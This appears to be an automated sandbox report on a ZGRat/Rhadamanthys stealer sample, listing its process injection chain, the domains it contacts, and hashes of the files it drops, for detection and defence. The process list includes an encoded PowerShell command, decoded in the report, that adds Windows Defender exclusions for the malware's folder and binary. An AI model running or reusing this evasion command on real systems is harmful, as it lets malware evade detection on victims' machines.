Malware Analysis Report

2025-06-15 19:48

Sample ID 240212-j1yv1aad26
Target 96af9bc7db122e2486c0c1f1b90faacc
SHA256 1b9339d0a70cdef37f4827a81100f9e8158a5633dc8b7a2c3b616f070ce49b5d
Tags upx zgrat rat rhadamanthys stealer
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 10/10

SHA256 1b9339d0a70cdef37f4827a81100f9e8158a5633dc8b7a2c3b616f070ce49b5d

Threat Level: Known bad

The file 96af9bc7db122e2486c0c1f1b90faacc was found to be: Known bad.

Malicious Activity Summary

upx zgrat rat rhadamanthys stealer

Detect ZGRat V1

Rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

ZGRat

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

UPX packed file

Suspicious use of SetThreadContext

Drops file in System32 directory

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-02-12 08:08

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A (2 identical rows)

Analysis: behavioral1

Detonation Overview

Submitted 2024-02-12 08:08

Reported 2024-02-12 08:11

Platform win7-20231215-en

Max time kernel 128s

Max time network 123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A (32 identical rows)

ZGRat

rat zgrat

Downloads MZ/PE file

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A (2 identical rows)

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2476 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe (5 identical rows)
PID 2220 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe (4 identical rows)
PID 2220 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe (4 identical rows)
PID 2808 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe (4 identical rows)
PID 2808 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe (11 identical rows)
PID 1828 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\WerFault.exe (4 identical rows)
PID 816 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe (9 identical rows)
PID 2696 wrote to memory of 3016 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (3 identical rows)

Processes

C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe
  "C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe"

C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe
  "C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe"

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
  "C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe" 0

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
  "C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe" 0

C:\Users\Admin\AppData\Local\Temp\BBLb.exe
  "C:\Users\Admin\AppData\Local\Temp\BBLb.exe"

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
  C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 124

C:\Users\Admin\AppData\Local\Temp\BBLb.exe
  C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Windows\system32\taskeng.exe
  taskeng.exe {28965341-BA25-4A85-9653-A38C99C1CD7A} S-1-5-21-928733405-3780110381-2966456290-1000:VTILVGXH\Admin:S4U:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA
  The -enc argument is UTF-16LE base64; decoded it reads: Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; Add-MpPreference -ExclusionProcess AttributeString.exe; (a Windows Defender exclusion for the drop directory and for the AttributeString.exe binary listed under Files, launched via the taskeng.exe scheduled task shown above).

Network

Country Destination Domain Proto
US 8.8.8.8:53 hubvera.ac.ug udp
RU 91.215.85.223:80 hubvera.ac.ug tcp
US 8.8.8.8:53 ddlakava.ac.ug udp
US 8.8.8.8:53 bit.do udp
US 23.21.31.78:80 bit.do tcp
US 23.21.31.78:80 bit.do tcp
US 8.8.8.8:53 rebrand.ly udp
US 15.197.137.111:80 rebrand.ly tcp
US 8.8.8.8:53 fran.ac.ug udp
US 8.8.8.8:53 fransceysse.ac.ug udp
US 8.8.8.8:53 tinyurl.com udp
US 104.20.138.65:80 tinyurl.com tcp
US 8.8.8.8:53 kode.ac.ug udp
US 8.8.8.8:53 kodekode.ac.ug udp
US 8.8.8.8:53 tuekisa.ac.ug udp
US 8.8.8.8:53 partadino.ac.ug udp
RU 91.215.85.223:80 partadino.ac.ug tcp
US 8.8.8.8:53 markinda.top udp
US 23.21.31.78:80 bit.do tcp
US 23.21.31.78:80 bit.do tcp
US 8.8.8.8:53 movescx.top udp
US 8.8.8.8:53 cointra.ac.ug udp
US 8.8.8.8:53 muylove.ac.ug udp
US 8.8.8.8:53 partiad.top udp
US 8.8.8.8:53 partiad.xyz udp
US 8.8.8.8:53 udp

Files

memory/2476-0-0x0000000000400000-0x0000000000427000-memory.dmp

memory/2476-3-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2220-4-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2476-5-0x0000000000240000-0x0000000000248000-memory.dmp

memory/2220-8-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2476-9-0x0000000000400000-0x0000000000427000-memory.dmp

memory/2220-13-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2476-7-0x0000000000270000-0x0000000000297000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 9d8f024c162815eca1f4cfad352ab507
SHA1 14c45c70f00bd02e0680d6183142608c14941124
SHA256 bc70994ab3a1b3308eeb8af57f6f62f6c8556d79ea0517336558f2da188ea14c
SHA512 0383394d8b832d0a28126c6689f93e08f2b2897e63dec9688fb857a2aedbc10b42c46506aac78925a257706a4bd10126c075912779e86cc4a165f871f4b251ea

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 d398906e371437d8cb36e820f9ee9fdc
SHA1 1ee21e725345d9e70d38ea0b2c96a7558c36d161
SHA256 4ed07c2a39e19e53b2e85db609bd23e24bcb21a033ccf03d06315e00e4ad433b
SHA512 986a90cea2ea868daf97dccd0a36841aa501a4cd02d46e556795b1faabb0aa825bf059bee1ddf5aeadfe9c1a605567604ff5f20e7fadd01a4c2ce8ca376e0e5d

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 a5233ad11d01b0684a4a742aea931a6b
SHA1 a738c48b5cdd62ab0f80780e52d93718bfadf52c
SHA256 7ac299c93a19a90c352a9112bc5f30e71d9a77929caf0eff903a1ded3d2cd027
SHA512 6dbe1583b355cbc17dbb942cec5fa65b1e353961aa6f5e2c19fcc0aa746d1730da9ea9b4c9253e25a5e2ed37a9ead31e7096ce32a35cd83f27b142533f8fd025

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 2fed29c76f2a11ec7ae738d030db1d79
SHA1 52fde76e90d950f4739f968dd406b2fb257cc97f
SHA256 6187097a8ad07528c885ee4df96a80848d4b59f2d0024b2527ebe7f9541e318f
SHA512 34d6ffc0f6db7906b2cad082f8afdefaf350c6686543b4bc21d4f57ec2b4e54b86746d4fdf70d52f7f6230cc4055e4e2b11c4fb208f27a4edba62b8319b4f231

memory/2808-25-0x0000000073A80000-0x000000007416E000-memory.dmp

memory/2808-24-0x00000000008D0000-0x0000000000AF8000-memory.dmp

memory/2808-26-0x00000000048A0000-0x0000000004AA8000-memory.dmp

memory/2808-27-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-28-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-32-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-34-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-30-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-36-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-38-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-40-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-42-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-48-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-50-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-46-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-44-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-52-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-56-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-60-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-58-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-54-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2220-62-0x0000000000400000-0x0000000000405000-memory.dmp

memory/2220-64-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2808-65-0x0000000073A80000-0x000000007416E000-memory.dmp

memory/2220-66-0x0000000000400000-0x0000000000405000-memory.dmp

memory/2220-69-0x0000000000400000-0x0000000000405000-memory.dmp

memory/2808-70-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-74-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-78-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-82-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-88-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-86-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-84-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-80-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-76-0x00000000048A0000-0x0000000004AA3000-memory.dmp

memory/2808-72-0x00000000048A0000-0x0000000004AA3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 84b7642e84d945060d870593b255ffe7
SHA1 598e57f7628c4bdd4d55af95c9e17e82e1161edf
SHA256 2d3b8471b5d04701fe00d925c0c0b52d1d2b0d77a7b8886a133aab849b9f30b2
SHA512 58c8dccdf4e75ba5aa1cacde224ebd688a86b33761e03eb0886f15c97d49e92516717e691ef7754709e170d474eb6c7903ca99522b0ba83ee31e9b8116bc991e

memory/2288-465-0x0000000073A80000-0x000000007416E000-memory.dmp

memory/2288-463-0x0000000000DD0000-0x0000000000FF8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 50ef7597e47f97e2e6dc1463536fb047
SHA1 1b4e4e086e71d98b80080f34d2cc97e7f029c74c
SHA256 c8225e680b373b27fd79aad0dfc907f08b1eea6fa4f6b12f1ed8164d534e84dc
SHA512 d7acf69c40753d466ceccd4afdb141d69a1b5a6f5c21596990220c756f4f23402c80a4f824706c025a249575b0ccbdea69a127c05e38e9510521c4f090ea3983

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 55a46b19cb826582900c42e24e39d737
SHA1 209794e5247c876d56aab1157d7061bee43b4e62
SHA256 ac0867d88f3b648a4121814e12cc711600e7da77bbff3df266f067e968fb81f1
SHA512 bf5401e62fa143a0f0bad1c63bda3061aade4cd57f8d2d4c2ddd36fce7d441cab3c8245c07501ffc687a5435013f58572b3fd83ede01a3b00961edeab82c0e15

memory/2808-1555-0x0000000002100000-0x0000000002140000-memory.dmp

memory/2808-1567-0x00000000003D0000-0x00000000003D1000-memory.dmp

memory/2808-1870-0x0000000005660000-0x0000000005800000-memory.dmp

memory/2808-1872-0x0000000004E50000-0x0000000004E9C000-memory.dmp

memory/2288-1919-0x0000000004BD0000-0x0000000004C10000-memory.dmp

memory/2288-1920-0x0000000000370000-0x0000000000371000-memory.dmp

memory/2288-1922-0x0000000073A80000-0x000000007416E000-memory.dmp

\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 443da3a41ece40b2043787032eeccfcf
SHA1 8a414bd758e3e50de70ee9fad39ab124a43e279b
SHA256 6c2be637d7af76d6d0380c2661aab3796e972d52d5b44726d2db7f57181deda0
SHA512 fdf8a2e8ca6ca43c01bc36d96bb565a3a4d0bbeb875f962d091e5ffeb23bed04e26442b1873967e19eb023d7140e3ffd19d1716ab2bf1a0f4f5ddbb0c056c06e

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 d6d5eae5855383e77c67f6f9b7df8dd7
SHA1 0947f88221d255f76517f360d2459c29d700ecb6
SHA256 4be4fcd651fb28a4c1b7fd4161221ce2a7e74f5e8ad437d2692e578f90c2be35
SHA512 c80eb22ec344cee40d916fd3f05e03c26c912ba362b52c2f28875a83cf07fbef30b64d91a9d594e18ecb6a858e46f2d17b1792f86b5d2cc0f905705f81edfb5f

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 de9bca236cb10c833c24c6591c54d07c
SHA1 8201dbcbd020df3c26991fc55e9c3013df0b44e8
SHA256 26f41925dadd66eb00bb3ffede516f82c5b863508e0cac8e2cc2c2b3bd7fbd56
SHA512 eca9663434e44c49b3ee292c53f2ff781b41e6b9a2d044fa2dae8955d9374376bc7542c98c6f6ddbc2f4232300c66855a7d2e31c7b0c69c31255823e507c09ab

memory/816-1930-0x0000000073A80000-0x000000007416E000-memory.dmp

memory/816-1929-0x0000000001030000-0x0000000001170000-memory.dmp

memory/816-1931-0x0000000004920000-0x0000000004960000-memory.dmp

memory/816-1932-0x0000000004C40000-0x0000000004D68000-memory.dmp

memory/816-1933-0x0000000004D70000-0x0000000004E9A000-memory.dmp

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 51919b0ef17774e9c777ee725da6c4d3
SHA1 f9b8449253b99a4990772c0d4eb73f7a661918f5
SHA256 89e5c64c44b2d2bb3a78e8a012ca218051a786178c5872cc94b0b2b49ca140f0
SHA512 f9b9614a6809163ff5f399ca8f8cc3be034778f45a1cdbf87ef6b72f9f9dde5861d809a544d27e5cefe94777e9e96890eee4c703e1e3de32e6c6a0c365a058be

memory/2808-1958-0x0000000073A80000-0x000000007416E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 bd6c337c701f84ad10090c91c5898e90
SHA1 0b34cffbb4e4989bd212bfb6893618c7615663da
SHA256 1928e319e10faefcda78ac6fbf7e718c3c763deb0a8c4698e30a16408a0e3a35
SHA512 334fd09c8a00d88b1a4ea8297425a22ed9dc11647b6f2dad391a53736fa866a17280f7085b92b0d612fbaad24508eb2e0da2591c4dd9791e3c01f105f6c67e3a

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 9f74bec46233e8ffc6b03ca635f3a2a8
SHA1 fd8d4598b2e31cb989301d2f67a7689c45b8dd9b
SHA256 290f4f88a43b4e9e23df7dab7eaca150273a0527a85d1a61281c74eb8aa67ca8
SHA512 5e5b2ac7422600f3da361cf8a94d134603c82a689b066879a3cce6c5c94bc56b8bc28cac00009be08d929a7ec5aa6cb0f590fe6a4745da13995cc0c860238aae

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 b60184f40ddf5ec7fc61c65b62fc9141
SHA1 682bf3d0b76218ff2cdc19e098047cb1c42fd621
SHA256 0b7f3500478e07064030f7e1a6f07f0693a9de02bf087dc16e88406ae68e874a
SHA512 536a6570b0388750d77276603d666e271bf89e92d8cc469f6d82b0c4e6c182cca1efbb1ea32fccbc9009c5810858c333663ca6d11d04fe4d3ebd820def8a6f4e

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 9aa45e5cc7338a6ee96a9499f29bc203
SHA1 17e924683892829ad9892dd41c49361910ce76b6
SHA256 4a958b0ea4334ade568948d58c6af091c4b669fc0012680abc823dd7050f4ea9
SHA512 bce3105732d37cdda999a96442e6a398011de3317a931b55a5f55e4f9eb5b306ab217e26378934a10d8ddbab61880bb1d3d948cc29c20c154274b3507485e1a9

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 264aec5e8f163adefa07e0b41ec0c2d5
SHA1 ac4ae6815056b5acd081722899e64920256b2ad0
SHA256 681280e76f70d866d12a9ff187527f18ec1b2d4d85e12ff83c432726b9c4742c
SHA512 5f4688c9305c6a4cbd4cb8693a8b489f4f6ea0364cee83e3f2070929f6b437cc0ba752c6eb60643d8692253439e11d02acd14760505496d4d973b87c7d66fcdc

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 84df7195deebf80a244bcef74605b0da
SHA1 90873f5500dc9cf95f9c6f053dc7ca6295ee4b08
SHA256 48880f0748870a2dc80fe97359d0151f85f19c15bc6a4560bd4bc9ea282099cb
SHA512 3913e970d25601be815fde2505d28dd6a28d3ad21d18852460a2a3bfd57e1c7f143a2b7a352db72f035df1db8ea666ed5cfbb78f899dcba125f79b9b4381c17e

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 92bfda8e08553d58db843e802d9fc7d1
SHA1 42249be3674af7880596fa8b3df3d5f7f49bf899
SHA256 1532f0669c6ad020abf12e0931c96a22a81a97fe16458f74662a26ca6afebc54
SHA512 ae46050f0d653a8181908ea736db3276049c9d4e665d197cff10fb58867568bdf8638e06d93075b1bb76548dbf631f7262243e2d564036f2dcec4cfa0bb1c16d

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 325e180dece8f34a28e7429d3caa0c56
SHA1 2925a8d2e51c6423ae9b564bbeccce48708a5452
SHA256 509f32082c57fb92bc153d63fe6003c9e7219368c71fba6c66ecea1bc7d7570c
SHA512 391d00c9149d1f1c6d9f625833e52b21222834d3b982197f28d9019911042dbb52ddf17b440c9c73bd7868e57c894f339f7d5dacf3ee9458d2ef49079a9de5e2

memory/816-2890-0x0000000000430000-0x0000000000431000-memory.dmp

memory/816-2891-0x0000000004840000-0x0000000004900000-memory.dmp

\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 4071afad62bc8c7141c15894b435ba1e
SHA1 19ee80188d6a57a1ebb8107c4d54e3e3896b5f95
SHA256 92b1cd92991780c9716e8aa50a2189853ab3a7518125d93a04268a5820adaba1
SHA512 beed7807f244a355a46e590f6e964f643192b3b4950cef84fa9c53d51b01d243505ea7e17db5d993fff99899c3dcefafc02ce8dc1ba1a8bd4590524b21d5f7a5

memory/816-2906-0x0000000073A80000-0x000000007416E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 b16246fcde6fde7f4ba6ceb8e6a3f146
SHA1 fe006657d27ddc87cf9b19985693b9949f0f6503
SHA256 891b9a420c7a69716c80150fde1dbb4a737cb32843074ba024ca72b18e538c7d
SHA512 1871c78d027d93b3cefd572fae1acc0a41ce818f5038b4270cc6deed4ffceebf2c246f12c643f0f87287e100e60d3dea0d12c32c3fd98fe12fdc4a2e79cd23bd

memory/1976-2910-0x0000000000400000-0x000000000049C000-memory.dmp

memory/1976-2912-0x0000000004920000-0x0000000004A08000-memory.dmp

memory/1976-2913-0x00000000048E0000-0x0000000004920000-memory.dmp

memory/1976-2911-0x0000000073A00000-0x00000000740EE000-memory.dmp

memory/1976-5115-0x00000000005D0000-0x0000000000626000-memory.dmp

memory/2220-5119-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1976-5120-0x0000000000D70000-0x0000000000DC4000-memory.dmp

C:\Users\Admin\AppData\Local\TypeId\xutqjisn\AttributeString.exe

MD5 71eb1bc6e6da380c1cb552d78b391b2a
SHA1 df3278e6e26d8c0bc878fe0a8c8a91b28c5a652d
SHA256 cefa92ee6cc2fad86c49dd37d57ff8afcb9b9abef0a110689e6d771394256bd6
SHA512 d6fab2c469924b8202f7964e864f66d6b6151937c8d134fb40e1f1d3787cf22328892c3f7209786e0b42e1abd5ca71a61f40538ef1e93534d2a98bf6d4448e90

memory/1976-5122-0x0000000073A00000-0x00000000740EE000-memory.dmp

memory/3016-5127-0x0000000019DE0000-0x000000001A0C2000-memory.dmp

memory/3016-5128-0x000007FEF5520000-0x000007FEF5EBD000-memory.dmp

memory/3016-5129-0x0000000001020000-0x00000000010A0000-memory.dmp

memory/3016-5131-0x000007FEF5520000-0x000007FEF5EBD000-memory.dmp

memory/3016-5132-0x0000000001020000-0x00000000010A0000-memory.dmp

memory/3016-5130-0x0000000001000000-0x0000000001008000-memory.dmp

memory/3016-5133-0x0000000001020000-0x00000000010A0000-memory.dmp

memory/3016-5134-0x000007FEF5520000-0x000007FEF5EBD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted 2024-02-12 08:08

Reported 2024-02-12 08:11

Platform win10v2004-20231222-en

Max time kernel 89s

Max time network 149s

Command Line

sihost.exe

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A (33 identical rows)

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3204 created 2520 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\system32\sihost.exe
PID 3808 created 2520 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Windows\system32\sihost.exe

ZGRat

rat zgrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A (3 identical rows)

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4416 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe (4 identical rows)
PID 3784 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe (3 identical rows)
PID 4888 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe (3 identical rows)
PID 4888 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe (10 identical rows)
PID 3204 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\dialer.exe (5 identical rows)
